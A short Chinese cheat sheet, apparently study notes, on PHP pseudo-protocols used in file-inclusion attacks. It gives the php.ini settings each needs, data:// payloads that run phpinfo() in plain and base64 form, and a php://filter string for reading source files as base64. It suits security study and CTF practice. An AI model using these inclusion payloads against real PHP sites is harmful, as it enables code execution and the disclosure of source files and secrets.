伪协议
php://input
allow_ _url_ include选项必须设置为on,否则无法成功,此时allow_ url_ fopen是否开启无关紧要。
php:/input是用来接收post数据的
典型: file_ get contents()函数, 配置开关不受影响
enctype="multipart/form-data"的时候php://input是无效
data://
allow_ url_ include与allow_ url_ fopen选项必须设置为on
用法:
data://text/plain, < ?php phpinfo()?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
或者
data:text/plain, <?php phpinfo()?>
data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
php://filter
用法:php://filter/read=convert.base64-encode/resource=[文件路径]

浙公网安备 33010602011771号